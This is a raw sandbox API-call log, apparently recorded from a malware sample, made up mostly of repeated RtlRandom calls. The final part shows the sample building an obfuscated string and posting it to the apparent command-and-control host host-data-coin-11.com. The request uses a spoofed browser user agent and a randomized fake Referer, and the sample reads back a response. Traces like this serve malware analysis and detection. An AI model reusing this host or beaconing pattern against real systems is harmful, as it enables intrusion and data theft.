Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8bb9f320 [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb8f5fdde [0190.524] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x81e1fac5 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3a122b9d [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x957d7d86 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcfd3ac6f [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb0cf081c [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbc8aee3c [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdf1ccc5d [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd9eb8e32 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6c0bd12e [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc0164ec5 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa199d04a [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6433eb9a [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe5638294 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x56723aa3 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x69dceea2 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9dec729f [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1fd6cf55 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9a27eb9b [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd3a99ce0 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb7f63297 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbe86e1ab [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa73c9311 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcf43603e [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x44ade471 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7ee8624b [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6945a6f0 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x91d8403b [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x159c7b3d [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc5f51f64 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7d387689 [0190.525] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x74773268 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x256ac59e [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1baaa6a7 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbb5f1d2b [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x179575fc [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x87a05500 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcab9f547 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbe82363e [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbcfbf3b6 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb2285323 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe29775cf [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6e05ae66 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf6e69d08 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9f9f7356 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x15fbc0bb [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3b89b38a [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2f0ccc6d [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x76baf090 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3e997908 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x37f16c30 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4f26ff9b [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1f75c4b0 [0190.526] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd7a16559 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3592c96a [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb20be7d1 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8950d35d [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe22d65d [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5f3a8a0e [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x60fefaad [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x799e85de [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x23367ef2 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaa7d35ce [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaedc2068 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbf368667 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x46121b23 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x56d4be44 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x69a58cee [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1b5776ee [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x41818681 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6957cc85 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5aef1586 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7e475ecb [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xba4c5264 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe2f8e3fe [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd3f76e7d [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfe7c17f [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x59ff4472 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xac95d4b5 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7df768a5 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2f42c7e4 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd57e2d3b [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3d16daf4 [0190.527] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9683f36e [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x619250d9 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2b9831ca [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3df78589 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xebe6fdbc [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x21f043c6 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf1aa1f2f [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf8c60ac0 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3be17012 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf83da5f1 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x891c48af [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x71557c9 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb2e4e2c1 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xddf44825 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xde245c6b [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x4b502cd1 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x477cf685 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x56726e68 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe9ec789f [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xab0dcb0d [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x17727480 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5f5f8d6b [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xeb544359 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf7d0a5c5 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc4452b47 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x187cca30 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xec67c4af [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xed2b5f34 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x18cb71cb [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7ad57ff9 [0190.528] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6ce13492 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x832cb474 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa22b474 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf11b6dd8 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x89440d45 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x76beea [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbb3b67a7 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x740b4f07 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc547019c [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdfdba548 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9105695d [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x99f6616e [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6049bc4c [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6ca3f90d [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9692e3c8 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa0c4cfd [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9eb88d62 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaacb06cf [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3b74c68 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x950da2a2 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9a13f637 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xff710a19 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7159461f [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x69a16334 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd62ee4e2 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1ed826d9 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa856cb1e [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x448564da [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x15eeee8 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2b4082e2 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd110da6f [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8af08973 [0190.529] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x264715f [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x90705e83 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbd8f243a [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x65c8be42 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8e021098 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc3381cd4 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa60b794f [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x82336651 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe048997a [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7322aacf [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x74d5447 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x20ce3420 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xebe17a39 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x15330d86 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd31197ea [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1006f64 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x58e75926 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9938c2cb [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7fc77bed [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3803d5c4 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x29578529 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9c026719 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf86535c4 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc846ba5d [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa78e9766 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe29f83ef [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd14de555 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd3fb5a26 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa1f9168 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd5d46c93 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6ba51e3a [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd458b139 [0190.530] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa8813a48 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xdae3ff61 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcaf01960 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7b8a5a50 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x69c7ae83 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe05c93fc [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1f21639d [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xd19b371d [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x46b2beb6 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf95f2ba3 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x458d29a [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x124a9a0 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x90d5ebbb [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7c4325ff [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xf4db7cb7 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xabc25de4 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x41eb77e2 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x560453cb [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1e07bcbf [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xaa4d9a29 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xe6a43149 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x3e7541f5 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xadeb8da3 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xfa217419 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc6f8de58 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7391db7c [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xed19c88e [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x1a724288 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x55e80002 [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xefb4b3bf [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x9968924a [0190.531] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xcc373bf9 [0190.532] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xa38ae636 [0190.532] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xb8536aae [0190.532] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6b391c27 [0190.532] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x643f09fd [0190.532] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x5b2e7d05 [0190.532] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x81ffc5ce [0190.532] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x8286e74b [0190.532] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x163) returned 0x92119b0 [0190.532] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0190.532] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0190.532] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0190.532] lstrcatA (in: lpString1="", lpString2="og+i`\"U;1LON?^^PdcO6E6;WXXS55.jMa6rGhk98//*w?'\"S6Zj+0l@K<6g4\"Q\"ko&Hm5jOuTJ1;WT3Z[/_2+hw>JvS8aU/5P0moSdpa\\u+$,OHJ?tqCNYtc=*QuXd\"NRd$R9.:E`XdRGDU$6c'IGn#r$q%`'[VQ6Y@E'H.$KW6s9g[z0:@'A-YnRm^z7f9yAY6h32@[f7&lq5D!*U2);Hg&.q:cEzBDw!\"J(r*(pco%iaHiZ]7rbJvS8aU/5P0moSdpa\\u+$,OHJ?tqCNYtc=*QuXd\"NRd$R9.:E`XdRGDU$6c'IGn#r$q%`'[VQ6Y@E'H.$KW6s9g[z0:@'A-YnRm^z7f9yAY6h32@[f7&lq5D!*U2);Hg&.q:cEzBDw!\"J(r*(pco%iaHiZ]7rbJvS8aU/5P0moSdpa\\u+$,OHJ?tqCNYtc=*QuXd\"NRd$R9.:E`XdRGDU$6c'IGn#r$q%`'[VQ6Y@E'H.$KW6s9g[z0:@'A-YnRm^z7f9yAY6h32@[f7&lq5D!*U2);Hg&.q:cEzBDw!\"J(r*(pco%iaHiZ]7rb9_]sFnr&tdZ%lb8:h;o'DyDcB7t$orFr\"Eodbs)ja\\;+4E6Fpk*z&):H5vE7K?W>,g]1HV%75g5*6F^lsrs!%+^h`WSxr]8HsAY^or-6%lot-3C?\"" | out: lpString1="r#A/6`nk3GgynpcS\"uFcd?zyp3KYF*`rUW-V9ruDS:4'%W-81h!N=v:O_:FQ$X-u+*Ak7N@vOKN\"KMYTCff_z]Cr1uzde2H(q&KN$>9_]sFnr&tdZ%lb8:h;o'DyDcB7t$orFr\"Eodbs)ja\\;+4E6Fpk*z&):H5vE7K?W>,g]1HV%75g5*6F^lsrs!%+^h`WSxr]8HsAY^or-6%lot-3C?\"") returned="r#A/6`nk3GgynpcS\"uFcd?zyp3KYF*`rUW-V9ruDS:4'%W-81h!N=v:O_:FQ$X-u+*Ak7N@vOKN\"KMYTCff_z]Cr1uzde2H(q&KN$>9_]sFnr&tdZ%lb8:h;o'DyDcB7t$orFr\"Eodbs)ja\\;+4E6Fpk*z&):H5vE7K?W>,g]1HV%75g5*6F^lsrs!%+^h`WSxr]8HsAY^or-6%lot-3C?\"" [0217.321] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10c) returned 0x9211b20 [0217.322] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0217.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9211840, cbMultiByte=30, lpWideCharStr=0x9211b20, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0217.322] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfc4fc18 | out: pProxyConfig=0xfc4fc18) returned 1 [0217.329] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x4a86fb0 [0217.329] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfc4fcd0 | out: lpUrlComponents=0xfc4fcd0) returned 1 [0217.330] WinHttpConnect (hSession=0x4a86fb0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x84fb6e0 [0217.330] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9210780 [0217.330] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x68) returned 0x92107a0 [0217.330] WinHttpOpenRequest (hConnect=0x84fb6e0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x4a18280 [0217.330] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x4e) returned 0x9211c40 [0217.330] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x10d) returned 0x9211ca0 [0217.331] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbf7c0070 [0217.331] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x12) returned 0x9210810 [0217.331] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x17) returned 0x9211dc0 [0217.331] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x7bca0ede [0217.331] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x237df3d8 [0217.331] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xbe8bf925 [0217.331] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0xc6c406a4 [0217.331] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x2283108e [0217.331] RtlRandom (in: Seed=0x410e9e | out: Seed=0x410e9e) returned 0x6fb0fb77 [0217.331] wsprintfW (in: param_1=0x9211ca0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://jayxm.org/") returned 39 [0217.331] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211dc0) returned 0x17 [0217.332] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211dc0) returned 1 [0217.332] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9210810) returned 0x12 [0217.332] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9210810) returned 1 [0217.332] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211c40) returned 0x4e [0217.394] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9211c40) returned 1 [0217.394] WinHttpAddRequestHeaders (hRequest=0x4a18280, pwszHeaders="Accept: */*\r\nReferer: http://jayxm.org/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0217.394] WinHttpSendRequest (hRequest=0x4a18280, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x92119b0*, dwOptionalLength=0x15e, dwTotalLength=0x15e, dwContext=0x0) returned 1 [0218.094] WinHttpReceiveResponse (hRequest=0x4a18280, lpReserved=0x0) returned 1 [0218.094] RtlAllocateHeap (HeapHandle=0x9210000, Flags=0x8, Size=0x2800) returned 0x9215d70 [0218.096] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9215d70, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fd88 | out: lpBuffer=0x9215d70*, lpdwNumberOfBytesRead=0xfc4fd88*=0x18) returned 1 [0218.098] RtlReAllocateHeap (Heap=0x9210000, Flags=0x8, Ptr=0x9215d70, Size=0x5000) returned 0x9215d70 [0218.098] WinHttpReadData (in: hRequest=0x4a18280, lpBuffer=0x9215d88, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfc4fd88 | out: lpBuffer=0x9215d88*, lpdwNumberOfBytesRead=0xfc4fd88*=0x0) returned 1 [0218.099] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x400000 [0218.101] RtlFreeHeap (HeapHandle=0x9210000, Flags=0x0, BaseAddress=0x9215d70) returned 1 [0218.101] WinHttpCloseHandle (hInternet=0x4a18280) returned 1 [0218.102] RtlSizeHeap (HeapHandle=0x9210000, Flags=0x0, MemoryPointer=0x9211ca0) returned 0x10d 